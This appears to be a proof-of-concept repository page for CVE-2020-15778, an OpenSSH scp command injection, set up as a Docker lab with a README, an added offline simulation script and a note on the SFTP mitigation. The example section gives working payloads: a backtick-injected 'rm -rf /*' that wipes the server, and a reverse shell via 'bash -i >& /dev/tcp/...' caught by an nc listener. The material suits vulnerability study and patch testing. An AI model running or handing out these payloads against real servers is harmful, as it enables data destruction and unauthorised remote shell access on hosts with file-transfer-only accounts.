POC details: 2383933bd6854d1c41c39eea62b6dad43818e277

Source
Related vulnerability
Title: OpenSSH OS command injection vulnerability (CVE-2020-15778)
Description: OpenSSH (OpenBSD Secure Shell) is a suite of tools from Canada's OpenBSD project for securely accessing remote computers. It is an open-source implementation of the SSH protocol that encrypts all traffic, which is effective against eavesdropping, connection hijacking and other network-level attacks. scp (scp.c) in OpenSSH 8.3p1 and earlier has an OS command injection vulnerability: an operating-system command is built from externally supplied data without the special characters or commands in it being filtered. An attacker can use this to execute arbitrary operating-system commands.
Introduction
# CVE-2020-15778

## Introduction
This repo reproduces [CVE-2020-15778](https://nvd.nist.gov/vuln/detail/CVE-2020-15778). The root cause is that the scp client builds the remote command `scp -t <remote path>` from the destination you type and has sshd run it through the remote account's login shell, so backticks or `$(...)` in the remote path are evaluated on the server before `scp -t` ever sees the path. Exploitation needs working SSH credentials for the account, so the practical impact is on accounts that are supposed to be limited to file transfer; upstream's answer is to use the SFTP protocol instead (scp defaults to it since OpenSSH 9.0).

## Steps
1. Build the Docker images for the scp server and client (each `cd` is from the repo root).
```bash
cd client
docker build -t client-cve .
```
```bash
cd server
docker build -t server-cve .
```

2. Spin up the scp server in a container.
```bash
docker run -d -P --name scp-server server-cve
```
Retrieve the internal IP address of the scp server with
```bash
docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' scp-server
```

3. Run the client in a container.
```bash
docker run --name scp-client -i -t client-cve
```

4. Inject your own shell command into the scp server by calling scp from the client.

In the client terminal, run
```bash
scp nil.txt root@<internal IP of scp server>:'`your command`/tmp'
```
The password is "PASSWORD". `nil.txt` is just the file being copied; the real payload is the backtick expression in the remote path, which the server's login shell expands (and, if the command prints nothing, scp then copies the file to `/tmp` as if nothing happened).
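An offline model of the mechanism the four steps above rely on, added here as an example (it is not code from this repo): it builds the `scp -t <path>` string the way the client does, runs it through a local `sh -c` standing in for the remote login shell with a fake `scp` on PATH, and checks that a backtick command in the path executed while `scp -t` itself saw only `/tmp`. The `build_remote_cmd`, `is_safe_remote_path` and `demo_injection` helpers and the temporary paths are my own; the `is_safe_remote_path` check is an illustrative client-side mitigation, not something OpenSSH does.

```shell
#!/bin/sh
# Added example, not part of this repo: an offline model of why the scp
# destination path is a command injection point (CVE-2020-15778).
#
# The scp client runs, roughly:   ssh user@host "scp -t <remote path>"
# The remote sshd hands that string to the account's login shell, which
# expands backticks and $(...) in <remote path> before 'scp -t' runs.
# Here the "server" is a local 'sh -c' with a fake 'scp' on PATH, so no
# sshd or container is needed; helper names and paths are assumptions.

# Build the remote command the way the scp client does: the path is
# appended verbatim, with no quoting or escaping.
build_remote_cmd() {
    printf 'scp -t %s' "$1"
}

# Conservative client-side check: reject remote paths containing characters
# the remote shell would interpret. Added here for illustration only;
# upstream's fix is to use the SFTP protocol instead of the scp protocol.
is_safe_remote_path() {
    case "$1" in
        *'`'*|*'$'*|*';'*|*'|'*|*'&'*|*'<'*|*'>'*|*'('*|*')'*) return 1 ;;
        *) return 0 ;;
    esac
}

# Simulate the server side for one injected path. Returns 0 when the
# injected command ran AND the fake 'scp -t' saw only the remaining path,
# which is exactly what the repo's '`your command`/tmp' payload relies on.
demo_injection() {
    tmp=$(mktemp -d) || return 1
    marker="$tmp/pwned"
    shim="$tmp/bin"
    mkdir -p "$shim"
    # Fake server-side scp: just record its argv so we can inspect it.
    cat > "$shim/scp" <<EOF
#!/bin/sh
printf '%s' "\$*" > "$tmp/argv"
EOF
    chmod +x "$shim/scp"

    # What the attacker types as the destination: a backtick command
    # (touch a marker file) glued onto a real directory.
    remote_path="\`touch $marker\`/tmp"
    cmd=$(build_remote_cmd "$remote_path")

    # The remote login shell evaluates the command line as-is.
    PATH="$shim:$PATH" sh -c "$cmd"

    status=0
    [ -e "$marker" ] || status=1                      # injected command ran
    [ "$(cat "$tmp/argv")" = "-t /tmp" ] || status=1  # scp saw only /tmp
    rm -rf "$tmp"
    return $status
}

# Stand-alone run: show the result of the simulation.
if demo_injection; then
    echo "backtick in the remote path ran on the simulated server; scp -t received only /tmp"
else
    echo "simulation failed" >&2
fi
```

The check in `is_safe_remote_path` is deliberately blunt (it also rejects legitimate filenames containing `$` or `&`); the point is that the client has no way to quote the path for an unknown remote shell, which is why switching protocols, not filtering, was the durable fix.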

## Examples
Here are some examples for this exploit.

1. Delete everything on the server, crashing it (this destroys the container; only run it against the throwaway server from step 2).
```bash
scp nil.txt root@<internal IP of scp server>:'`rm -rf /*`/tmp'
```

2. Get a reverse shell from the scp server back to the client (an interactive bash, mimicking ssh).

Listen on a port on the client machine (this blocks, so run the scp command below from a second shell in the client container).
```bash
nc -lvvp 8080
```

Use scp to make the server connect its interactive bash back to the client's listener. The scp target is still the server; the client IP only appears inside the injected command.
```bash
scp nil.txt root@<internal IP of scp server>:'`bash -i >& /dev/tcp/<internal IP of scp client>/8080 0>&1`/tmp'
```
```

The client IP address can be retrieved with
```bash
docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' scp-client
```
File snapshot

[4.0K] /data/pocs/2383933bd6854d1c41c39eea62b6dad43818e277
├── [4.0K] client
│   └── [ 119] Dockerfile
├── [1.5K] README.md
└── [4.0K] server
    └── [ 393] Dockerfile

2 directories, 3 files